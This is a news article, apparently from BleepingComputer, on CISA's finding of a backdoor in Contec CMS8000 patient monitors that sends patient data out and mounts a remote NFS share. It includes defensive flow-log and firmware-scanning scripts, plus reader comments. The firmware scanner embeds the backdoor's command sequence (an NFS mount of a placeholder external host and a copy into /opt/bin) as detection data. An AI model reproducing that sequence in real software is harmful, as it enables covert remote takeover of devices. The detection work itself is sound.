The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitoring device, include a backdoor that quietly sends patient data to a remote IP address and downloads and executes files on the device.
Contec is a China-based company that specializes in healthcare technology, offering a range of medical devices including patient monitoring systems, diagnostic equipment, and laboratory instruments.
CISA learned of the malicious behavior from an external researcher who disclosed the vulnerability to the agency. When CISA tested three Contec CMS8000 firmware packages, its analysts found anomalous network traffic to a hard-coded external IP address that belongs not to the company but to a university.
This led to the discovery of a backdoor in the company's firmware that would quietly download and execute files on the device, allowing for remote execution and the complete takeover of the patient monitors. It was also discovered that the device would quietly send patient data to the same hard-coded address when devices were started.
None of this activity was logged, causing the malicious activity to be conducted secretly without alerting administrators of the devices.
While CISA did not name the university and redacted the IP address, BleepingComputer has learned that it is associated with a Chinese university. The IP address is also hard-coded in software for other medical equipment, including a pregnancy patient monitor from another Chinese healthcare manufacturer.
An FDA advisory about the backdoor confirmed that it was also found in Epsimed MN-120 patient monitors, which are re-labeled Contec CMS8000 devices.
The backdoor
On analyzing the firmware, CISA found that one of the device's executables, 'monitor,' contains a backdoor that issues a series of Linux commands that enable the device's network adapter (eth0) and then attempts to mount a remote NFS share at the hard-coded IP address belonging to the university.
The NFS share is mounted at /mnt/ and the backdoor recursively copies the files from the /mnt/ folder to the /opt/bin folder.
[Image omitted. Source: CISA]
The backdoor will continue to copy files from /opt/bin to the /opt folder and, when done, unmount the remote NFS share.
"Though the /opt/bin directory is not part of default Linux installations, it is nonetheless a common Linux directory structure," explains CISA's advisory.
"Generally, Linux stores third-party software installations in the /opt directory and third-party binaries in the /opt/bin directory. The ability to overwrite files within the /opt/bin directory provides a powerful primitive for remotely taking over the device and remotely altering the device configuration."
"Additionally, the use of symbolic links could provide a primitive to overwrite files anywhere on the device filesystem. When executed, this function offers a formidable primitive allowing for a third-party operating at the hard-coded IP address to potentially take full control of the device remotely."
While CISA has not said what these files do on the device, it reported observing no successful communication between the devices and the hard-coded IP address, only attempts to connect to it.
CISA says that after reviewing the firmware, it does not believe this is an automatic update feature, but rather a backdoor planted in the device's firmware.
"By reviewing the firmware code, the team determined that the functionality is very unlikely to be an alternative update mechanism, exhibiting highly unusual characteristics that do not support the implementation of a traditional update feature. For example, the function provides neither an integrity-checking mechanism nor version tracking of updates. When the function is executed, files on the device are forcibly overwritten, preventing the end customer—such as a hospital—from maintaining awareness of what software is running on the device. These types of actions and the lack of critical log/auditing data go against generally accepted practices and ignore essential components for properly managed system updates, especially for medical devices."
Further supporting the conclusion that this is a backdoor by design, CISA found that the devices also began sending patient data to the remote IP address when they started.
CISA says that patient data is typically transmitted across a network using the Health Level 7 (HL7) protocol. However, these devices sent the data to the remote IP over port 515, which is usually associated with the Line Printer Daemon (LPD) protocol.
The transmitted data includes the doctor's name, patient ID, patient's name, patient's date of birth, and other information.
[Image omitted. Source: CISA]
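Because the device logs nothing, the behaviour described above can only be caught at the network edge. The script below is an added example, not code from the article or from CISA's advisory: it scans constructed firewall flow records for a patient monitor reaching outside the hospital network and flags the combination the advisory describes (portmapper/NFS on 111 and 2049, then port 515). The monitor VLAN, the internal address range, the HL7 gateway and the 203.0.113.9 destination are assumptions standing in for the redacted values.

```python
import ipaddress
from collections import defaultdict

# Assumed layout (placeholders, not from the advisory): patient monitors sit on
# their own VLAN, and anything outside the hospital's private space is external.
MONITOR_VLAN = ipaddress.ip_network("10.20.5.0/24")
HOSPITAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Ports the described behaviour touches on the wire: RPC portmapper and NFS for
# the remote share mount, LPD (515) for the patient-data transmission.
SUSPECT_PORTS = {111: "rpcbind/portmapper", 2049: "NFS", 515: "LPD"}

# Constructed sample export (timestamp src dst proto dport action).
# 203.0.113.9 is a documentation address standing in for the redacted IP;
# 10.20.7.15:2575 is an assumed in-house HL7 gateway, i.e. legitimate traffic.
SAMPLE_FLOWS = """\
2025-01-30T06:01:02Z 10.20.5.41 10.20.5.2 tcp 53 allow
2025-01-30T06:01:03Z 10.20.5.41 203.0.113.9 tcp 111 deny
2025-01-30T06:01:03Z 10.20.5.41 203.0.113.9 tcp 2049 deny
2025-01-30T06:01:05Z 10.20.5.41 203.0.113.9 tcp 515 deny
2025-01-30T06:02:10Z 10.20.5.41 10.20.7.15 tcp 2575 allow
2025-01-30T06:03:00Z 10.20.5.42 10.20.7.15 tcp 2575 allow
"""

def is_external(ip):
    return not any(ip in net for net in HOSPITAL_NETS)

def analyze(flow_text):
    """One alert per flow that leaves the monitor VLAN for an external host.
    Denied attempts count: CISA saw only connection attempts, and the device
    writes no log of its own, so the firewall record is the only evidence."""
    alerts = []
    for line in flow_text.splitlines():
        ts, src, dst, proto, dport, action = line.split()
        src, dst, dport = ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport)
        if src not in MONITOR_VLAN or not is_external(dst):
            continue
        alerts.append({"time": ts, "device": str(src), "dest": str(dst), "port": dport,
                       "action": action, "service": SUSPECT_PORTS.get(dport, "other")})
    return alerts

def backdoor_pattern(alerts):
    """Devices whose attempts to one external host include both the NFS mount
    and the port-515 transmission, i.e. the full sequence the advisory describes."""
    seen = defaultdict(set)
    for a in alerts:
        seen[(a["device"], a["dest"])].add(a["port"])
    return sorted({dev for (dev, _), ports in seen.items() if {2049, 515} <= ports})
```

Running `backdoor_pattern(analyze(SAMPLE_FLOWS))` on the constructed data returns the one monitor that attempted both the NFS mount and the port-515 connection; any external attempt from the VLAN is still reported individually by `analyze`.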
After contacting Contec about the backdoor, CISA was sent multiple firmware images that were supposed to have mitigated the backdoor.
However, each one still contained the malicious code; the company had simply disabled the 'eth0' network adapter. This does not mitigate the backdoor, because the script explicitly re-enables the adapter with the ifconfig eth0 up command before mounting the remote NFS share or sending patient data.
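A hospital team handed a "fixed" image can check for itself whether the command sequence described above is still in it. The following is an added example and not code from CISA, Contec or the article: a `strings`-style pass over an extracted executable that reports the indicators the advisory names (eth0 brought up, an NFS mount of a hard-coded address, a copy into /opt/bin) and points out when an `ifconfig eth0 down` is present alongside the `ifconfig eth0 up` that undoes it. The binary below is a constructed stand-in, not the real 'monitor' executable, and the exact mount syntax is assumed.

```python
import re

# Constructed stand-in for an extracted firmware executable: printable command
# strings between binary bytes. It is NOT the real 'monitor' binary; the commands
# only mirror the sequence the advisory describes, and the IP is a placeholder.
FAKE_VENDOR_FIX = (b"\x7fELF\x01\x01\x01\x00\x00"
                   b"ifconfig eth0 down\x00"                 # the vendor's 'mitigation'
                   b"\x90\x90\x00"
                   b"ifconfig eth0 up\x00"                   # undone by the backdoor itself
                   b"mount -t nfs 203.0.113.9:/share /mnt\x00"
                   b"cp -r /mnt/* /opt/bin\x00"
                   b"umount /mnt\x00\xff\xfe")

INDICATORS = {
    "brings eth0 up itself": re.compile(rb"ifconfig\s+eth0\s+up"),
    "mounts a remote NFS share": re.compile(rb"mount\b.*\bnfs\b.*\d+\.\d+\.\d+\.\d+"),
    "copies share into /opt/bin": re.compile(rb"cp\b.*/mnt.*?/opt/bin"),
}
IPV4 = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def printable_strings(blob, min_len=6):
    """Equivalent of `strings`: runs of printable ASCII at least min_len bytes long."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)

def assess(blob):
    """Report which backdoor indicators survive in an image, plus any hard-coded
    IPv4 literals, so a vendor-supplied 'fix' can be checked before deployment."""
    strings = printable_strings(blob)
    found = {name: any(rx.search(s) for s in strings) for name, rx in INDICATORS.items()}
    ips = sorted({ip.decode() for s in strings for ip in IPV4.findall(s)})
    # Disabling eth0 is cosmetic if the same image re-enables it before the mount.
    eth0_down = any(b"ifconfig eth0 down" in s for s in strings)
    return {"indicators": found, "hardcoded_ips": ips,
            "eth0_disabled_but_reenabled": eth0_down and found["brings eth0 up itself"],
            "backdoor_present": all(found.values())}

if __name__ == "__main__":
    print(assess(FAKE_VENDOR_FIX))
```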
Currently, there is no available patch for devices that removes the backdoor, and CISA recommends that all healthcare organizations disconnect these devices from the network if possible.
Furthermore, the cybersecurity agency recommends organizations check their Contec CMS8000 patient monitors for any signs of tampering, such as displaying information different from a patient's physical state.
BleepingComputer contacted Contec with questions about the firmware and will update the story if we receive a response.
Comments
Grumpower - 1 day ago
Why are these devices connected to the Internet? If for some reason Internet is a must, just blacklist the hardcoded IP in the firewall.
Drags - 1 day ago
These kinds of devices, or any IoT/OT devices for that matter, should not have any 0.0.0.0 access.
DavieBoy - 1 day ago
Given these from 2022, these devices should have been retired a long time ago:
CVE-2022-36385 - IMPROPER ACCESS CONTROLS - CWE-284
CVE-2022-38100 - UNCONTROLLED RESOURCE CONSUMPTION - CWE-400
CVE-2022-38069 - USE OF HARD-CODED CREDENTIALS - CWE-798
CVE-2022-38453 - ACTIVE DEBUG CODE - CWE-489
CVE-2022-3027 - IMPROPER ACCESS CONTROL - CWE-284
But then again, they're 25% off right now, so you never know :)
cakruege - 1 day ago
Is there also a backdoor in the software of the other devices from that company?
For example for the 24h blood pressure monitor?
This page:
https://contechealth.com/products/ambulatory-blood-pressure-monitor-nibp-holter-abpm50-usb-software-24-hour-record
links to:
Software download link:
www.dlsoftw.com
Index code: 05RK1069
download code for older version: 05wq7041
File: ABPM(F)_V5.3.4_Setup.exe
File: ABPM(F)_V5.3.3_Setup.exe
It's an InnoSetup installer, which can easily be extracted with innounp.
jblo - 1 day ago
The headline and grammar in the article reference "two healthcare patient monitors," yet I can only find information in the article regarding a Contec CMS8000; perhaps I've overlooked something. I am thinking that you intended to also address the recent FDA announcement [https://www.fda.gov/medical-devices/safety-communications/cybersecurity-vulnerabilities-certain-patient-monitors-contec-and-epsimed-fda-safety-communication] regarding the Epsimed MN-120.
Lawrence Abrams - 1 day ago
Yes, I had it in the original draft and it was removed by mistake. Adding it back. Thanks.
bernesto - 1 day ago
I can't be the only one who believes we don't have a monopoly on lazy programmers.
Let's use our critical thinking skills here.
A university IP... What do they do at universities? Is it a healthcare university? Aren’t universities typically involved in R&D and have commercialization programs? In R&D, isn’t there a need to collect and analyze lots of data, especially in healthcare, preferably automatically? Don’t they also typically employ students within the university? Developers, especially good ones, are typically the laziest humans. Lazy equals efficient. But they're humans nonetheless. Forgetful + novice = oversights. Universities, on the other hand, are bureaucratic institutions run by academics, not DevOps or SecOps veterans. And companies are profit-driven by non-tech business people who make stupid decisions. Look recently at SONOS... Cheap labor. Ignore the engineers. Ship it. What could go wrong?
Everyone jumps on the US-good, CCP-bad bandwagon without using common sense. The narrative the US pushes that the CCP wants to track every movement of their citizens and ours often overshadows their practical ability to do so. No different than our own government minimizing its desire to do the same and its ineptitude to do so. $500B data center to create 48h mRNA vaccines? Do they expect us to buy that BS? Especially from Larry and Sam? Larry would surveil his own mother in the bathroom. And Sam is a snake “OpenAI is open for the world good”. Oh please… go f yourself.
Tech bros are dicks. Governments lie. Politicians are stupid. Democracy is theater. And Americans’ privacy is a long-dead fallacy. Section 702, the Bank Secrecy Act, Snowden, TikTok... come on. Lawmakers took your privacy rights 50 years ago. And CEOs sold your data back to them and others shortly thereafter. Who reads EULAs anyway? And dead code in a heart monitor is news?
This was likely just field testing code left over and missed during code review by an underpaid undergrad. Not some nefarious plot to steal your heart rate data—that, mind you, is already freely available “legally” thanks to our own government/HIPAA, HITECH, and the 2.2 million BAA entities with their tens of millions of employees (look up limited datasets and reverse identification)... God forbid you go to China for business or pleasure, get sick, and can’t access your “own” health records… And let’s not forget our own government-mandated backdoors in our telecommunications the CCP has been loitering in for years that they told you was to protect you from foreign adversaries! Ben F. was right. And this is just what we know about. SMFH.
Are there bad actors in the world? Yes. You elected them. Immoral, self-enriching superstition-following, warmongering, idiot puppets. Watch C-SPAN once in a while. Hackers? The good ones don't leave a trace, and that’s a low bar… and most are just trying to expose the government (aka. The idiots) and corporations (aka The crooks) whose EULA you agreed to, but wouldn’t agree with.
DavidRedekop - 1 day ago
This is the kind of story that highlights the importance of egress control that can be managed with an approach of Zero Trust connectivity, which basically uses DNS as the root of trust, and therefore disallows *any* connection that didn't start with an authorized query from a Protective Resolver. It is simpler than it sounds as it is basically Default Deny All that is actually practical. What is needed and verified good, no problem. Anything else, not.
bernesto - 1 day ago
So true. "Control your own network ingress and egress". Which hospitals with good IT should be doing already. The part that gets me in this article is the 'implied' intent. If it was a known APT group IP, then I would raise both eyebrows. But a university... Meh. 20 years in the industry, and I still get surprised by the quality of code released into the wild by US coders - the hacks, workarounds, and just plain laziness. I'm not proud, I cringe when I look at code I wrote a decade ago "Who wrote this crap... oh..." LMAO.
DavidRedekop - 1 day ago
We won't have fewer of these stories coming out in the future. Even with public policy changes, we will have years and decades of legacy equipment that will never be discovered to be breached, but actual outgoing unauthorized and unintended connections can reliably be blocked in 2025.